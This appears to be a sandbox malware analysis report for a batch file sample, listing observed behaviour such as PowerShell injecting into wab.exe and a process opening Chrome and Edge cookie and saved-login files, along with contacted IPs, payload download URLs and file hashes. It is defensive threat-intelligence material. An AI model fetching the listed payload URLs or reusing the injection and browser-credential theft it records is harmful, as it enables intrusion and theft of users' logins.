Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2D4FAAC			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Windows Analysis Report Doc_004024024001.bat

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Doc_004024024001.bat

Malware Threat Intel
Provided by

Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.121.105.163	unknown	Bulgaria		43561	NET1-ASBG	false
47.91.88.207	www.tyaer.com	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	false

Name	IP	Active
www.oyoing.com	127.0.0.1	true
www.tyaer.com	47.91.88.207	true
www.theplays.shop	172.67.152.117	true
www.megabet303.lol	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://87.121.105.163/Punktet.hhp	false	Avira URL Cloud: safe	unknown
http://87.121.105.163/TjtonPwEiP175.bin	false	Avira URL Cloud: safe	unknown

ID:	1431497
Product:	CloudBasic
Start time:	10:36:06
Start date:	25.04.2024
Sample:	Doc_004024024001.bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	dfdb6404a262056b5e81e9bd0814d8aa
SHA1:	c6f2e620bbe3539d4a962c8b5509445ca0be2333
SHA256:	780eb381525edae3d27084370ae2e02dc4607842ccee9a8daae733475eb699bc

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F93358E626551B46E6ED5A0A9D29BD51	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bc32zhws.imz.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fy3mpi5u.ni3.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocinpzcp.ykt.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkjrsfcx.y4n.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\s5497I81	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)	data	CB79D11FC4123109D2EED62D35CBDA44	025E6C171643BDA48E9184A81E96653025CC2E9F	FDE0300CEE364EB2204135260989EC3BD77D1338255C1D6CF5A346CA62C2BF2D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5XGY2TGM0TXXOAVV8K1P.temp	data	CB79D11FC4123109D2EED62D35CBDA44	025E6C171643BDA48E9184A81E96653025CC2E9F	FDE0300CEE364EB2204135260989EC3BD77D1338255C1D6CF5A346CA62C2BF2D
C:\Users\user\AppData\Roaming\Stregmaalene.Dis	ASCII text, with very long lines (65536), with no line terminators	1FD3B8F732B03362349288C605C47101	70909888DA06BCD7F3AACB373DC1317EA45899C3	2CC6FBCDA2FA6A521CCF6FEE6D3A0B29A9BA52E2BFBB75E9FAC4378F987E8D9A